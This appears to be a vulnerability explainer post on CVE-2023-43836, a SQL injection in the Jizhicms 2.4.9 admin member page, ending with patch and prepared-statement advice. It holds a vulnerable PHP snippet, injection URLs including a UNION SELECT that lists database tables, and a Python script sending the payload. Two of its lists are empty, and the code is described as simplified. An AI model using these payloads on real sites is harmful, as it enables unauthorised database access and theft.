CVE CyberSecurity Database News

CVE-2023-43836 - SQL Injection in Jizhicms 2.4.9 Backend – How Attackers Can Steal Your Database

Poster -

If you run a website with Jizhicms version 2.4.9, there’s a serious security risk you need to know about—CVE-2023-43836. This vulnerability could let hackers steal, alter, or even delete everything in your database by using a method called SQL Injection. In this post, I’ll explain in simple English what’s going on, walk you through the technical details, show you some sample exploit code, and give you links to official sources and fixes.

What is Jizhicms?

Jizhicms is a lightweight open-source content management system made in China. It’s used to create blogs, company websites, and more. Like many CMS platforms, it uses PHP and MySQL to store and manage content.

What is CVE-2023-43836?

CVE-2023-43836 is the official identifier for a SQL Injection vulnerability found in Jizhicms version 2.4.9’s backend. Attackers who can access the admin panel (or sometimes just send the right web requests) can trick the application into running unwanted SQL commands. That can let them do things like:

How does the Vulnerability Work?

The vulnerability lies in the improper handling of user input on a *backend page* (URL endpoints like /admin/member/index.php) for Jizhicms. Specifically, the backend fails to thoroughly sanitize some GET and POST parameters, allowing attackers to inject malicious SQL code.

Let’s look at a code snippet from member/index.php (simplified for clarity)

// Vulnerable code
$where = " WHERE ";
if($_GET['groupid']){
    $where .= "groupid = {$_GET['groupid']}";
}
$sql = "SELECT * FROM jz_member $where";
$result = mysql_query($sql);
// ...

If groupid comes directly from the user (from the URL), an attacker can pass a value like 1 OR 1=1 -- and change the logic of the SQL query.

Imagine you’re logged into the Jizhicms admin backend. An attacker could craft a URL like

http://yourdomain.com/admin/member/index.php?groupid=1%20OR%201=1%20--%20

That would turn the SQL query into

SELECT * FROM jz_member WHERE groupid = 1 OR 1=1 --

The OR 1=1 part always returns true, so the result will be *all* users, not just ones in group 1. Attackers could use similar tricks to:

Full Exploit Example: Listing Database Tables

With a bit of trial and error, an attacker could use the following SQL injection to list all tables in the database (assuming enough error or debug info leaks):

http://yourdomain.com/admin/member/index.php?groupid=1%20UNION%20SELECT%201,table_name,3,4%20FROM%20information_schema.tables%20--+

What happens?
The app returns a member listing, but instead of member names, it displays the *table names* from your database!

Here’s a simple Python script that tries to exploit the vulnerability to dump usernames

import requests

url = "http://yourdomain.com/admin/member/index.php";
payload = "1 OR 1=1 -- "
params = {"groupid": payload}
session = requests.Session()
# You may need to supply cookies if authentication is required.
resp = session.get(url, params=params)
print(resp.text)  # Search for usernames/emails in the HTML

- GitHub Issue Tracker for Jizhicms (may contain patch/fix)
- Exploit Database – CVE-2023-43836
- NVD CVE Details
- Jizhicms Official Site (Chinese)

Is Your Site Affected? How to Fix

If you use Jizhicms 2.4.9 or earlier:
- Update Now! Download the latest, patched version from the official repository.
- Sanitize All Inputs: Make sure every user input, especially in the admin panel, uses prepared statements or parameterized queries.

Conclusion

*CVE-2023-43836* is a real threat for any website using Jizhicms 2.4.9. A single simple URL can expose your entire database to attackers. Always keep your CMS updated, sanitize input everywhere, and never underestimate SQL injection risks.

Timeline

Published on: 10/02/2023 21:15:34 UTC
Last modified on: 10/04/2023 17:04:16 UTC